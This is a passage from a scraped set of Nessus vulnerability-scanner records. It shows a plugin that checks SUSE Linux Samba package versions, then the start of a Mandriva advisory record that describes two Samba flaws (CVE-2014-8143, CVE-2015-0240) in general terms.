sp:\"0\", reference:\"libnetapi0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libregistry0-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libregistry0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"libwbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debugsource-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-32bit-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libpdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 
reference:\"libsmbclient-raw0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", 
cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", 
cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-4.1.12-16.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-debugsource-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.1.12-16.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-4.1.12-16.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been discovered and corrected in samba4 :\n\nSamba 4.0.x before 4.0.24, 4.1.x before 4.1.16, and 4.2.x before\n4.2rc4, when an Active Directory Domain Controller (AD DC) is\nconfigured, allows remote authenticated users to set the 
LDB\nuserAccountControl UF_SERVER_TRUST_ACCOUNT bit, and consequently gain\nprivileges, by leveraging delegation of authority for user-account or\ncomputer-account creation (CVE-2014-8143).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\n\nThe updated packages provides a solution for these security issues.", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-083.NASL", "href": "https://www.tenable.com/plugins/nessus/82336", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba4 (MDVSA-2015:083)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:083. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82336);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2014-8143\", \"CVE-2015-0240\");\n script_xref(name:\"MDVSA\", value:\"2015:083\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba4 (MDVSA-2015:083)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in samba4 :\n\nSamba 4.0.x before 4.0.24, 4.1.x before 4.1.16, and 4.2.x before\n4.2rc4, when an Active Directory Domain Controller (AD DC) is\nconfigured, allows remote authenticated users to set the LDB\nuserAccountControl UF_SERVER_TRUST_ACCOUNT bit, and consequently gain\nprivileges, by leveraging delegation of authority for user-account or\ncomputer-account creation (CVE-2014-8143).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). 
A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\n\nThe updated packages provides a solution for these security issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.16.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-4.1.17.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2014-8143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2015-0240\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-dc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-smbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-test0\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba4-wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64samba41\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", 